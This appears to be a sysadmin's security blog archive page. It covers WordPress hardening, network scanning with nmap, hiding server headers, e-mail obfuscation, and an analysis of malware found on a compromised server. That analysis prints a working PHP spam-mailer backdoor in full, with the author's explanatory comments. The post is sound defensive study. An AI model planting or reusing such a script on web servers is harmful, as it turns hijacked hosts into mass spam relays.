There’s a DoS problem with WordPress CMS and it won’t be fixed by it’s creators. I’ve decided to create a simple not intrusive solution for Apache hosted websites. Please click Continue reading for details. Continue reading Simple CVE: CVE-2018-6389 protection
Category: Security
How to find network device using it’s manufacturer name?
I’ve previously posted a note about finding Raspberry Pi without knowing it’s ip address. Well, basically it’s the same… Only you need to change MAC prefix to find other manufacturer. To wrap this is up, this is a command to find device by MAC prefix:
sudo nmap -sP 192.168.100.0/24 | awk '/^Nmap/{ip=$NF}/00:D0:23/{print ip}'
And here you can find actual MAC information (use CTRL+F).
Of course you need Nmap to do that! And sudo is necessary!
Beware that sometimes there might be many prefixes for one manufacturer. Also check company name precisely, for example HP is Hewlett Packard but it also can be ProCurve Networking by HP.
Fastest way to find if your WordPress has known vulnerabilities
There is a nice little tool known as WPScan (click read more to find how to install it). Continue reading Fastest way to find if your WordPress has known vulnerabilities
How to scan your network for WannaCry vulnerability (SMBv1 MS17-010)?
This tutorial is for Linux systems, especially Debian derivatives.
Continue reading How to scan your network for WannaCry vulnerability (SMBv1 MS17-010)?
Hunt for scammer
This is a brief history of scammer hunt that I’ve conducted today with my buddy from work. Continue reading Hunt for scammer
How to obscure your WordPress version and troll the attacker a little…
One of my company’s WordPress installations has been hacked by Turkish hackers recently. After quick investigation I’ve found that script version was little bit old (not a very popular website, mea culpa, not updated very often). In case you didn’t know, WordPress is bundled with readme file by default. I’ve found that malicious scripts or people use that to determine your version’s branch. So I’ve decided to Troll them a little bit… Continue reading How to obscure your WordPress version and troll the attacker a little…
How to setup pushover alert on logon event in Windows
In this post I’ll show you how to configure Pushover with Windows server. In this specific case it will notify you when someone logs onto your machine. Continue reading How to setup pushover alert on logon event in Windows
Simpliest way to obfuscate e-mail address using jQuery
Here is a simpliest jQuery code to protect e-mail addresses on your website from spam bots. Just put this in a script tag into the head section:
$(window).load(function() { // anti spam var r='random-string'; $('.'+r).each(function() { var $this = $(this), value = new String($this.text()); value = value.replace('['+r+']', '@'); $this.replaceWith($('<a></a>').text(value).attr('href', 'mailto:'+value)); }); }); |
Now replace random-string with any really aleatory set of characters eg. dhhIDu338
And here is the HTML part. Publish every e-mail address on your page using this code:
Contact: <span class="random-string">johndoe[random-string]mail.com</span> |
How to remove unwanted HTTP Response Headers in IIS 7.5
Hiding server software is one of ways to protect your services from hackers. It’s quite easy to obscure IIS identity. In few steps I’ll show you how to accomplish this task on WIMP stack.
Continue reading How to remove unwanted HTTP Response Headers in IIS 7.5
PHP malicious code analysis no. 1
I found this piece of a PHP malware code on a compromised web server that I started to administer. It’s name was random character string eg. acbjxuu.php. There were about 20 more scripts of this kind. It’s rather very simple script for spaming purposes. For your understanding I’ve wrote what it’s doing in comments between code lines.
if (isset($_POST['task'])) { // be sure to display all PHP errors error_reporting(E_ALL); ini_set('display_errors', TRUE); // disable default PHP memory limit ini_set('memory_limit', '512M'); // disable PHP execution time limit set_time_limit(0); ini_set('max_execution_time',0); ini_set('set_time_limit',0); // get serialized array from POST var named task // example array structure: array(array('to'=>'[email protected]', 'msg'=>'message content', 'subj'=>'Message subject ex. cheap cialis :)')); $x = unserialize(base64_decode($_POST['task'])); // if task variable was wrongly serialized, just die silently... if ($x==false) {exit();} $send_from = base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); // now send half a million of viagra & cialis related mails... foreach ($x as $arr) { echo $arr['to']."\r\n"; $arr['msg'] = str_replace('[send_from_url]',$send_from,$arr['msg']); mail($arr['to'],$arr['subj'],$arr['msg'],"MIME-Version: 1.0\r\nContent-type: text/html; charset=windows-1251\r\n"); } exit('SEND OK'); } |
I’ll look in logs for IP addresses that tried to reach for this scripts. Maybe I’ll find something interesting. Wish me good luck and monitor your webserver contents!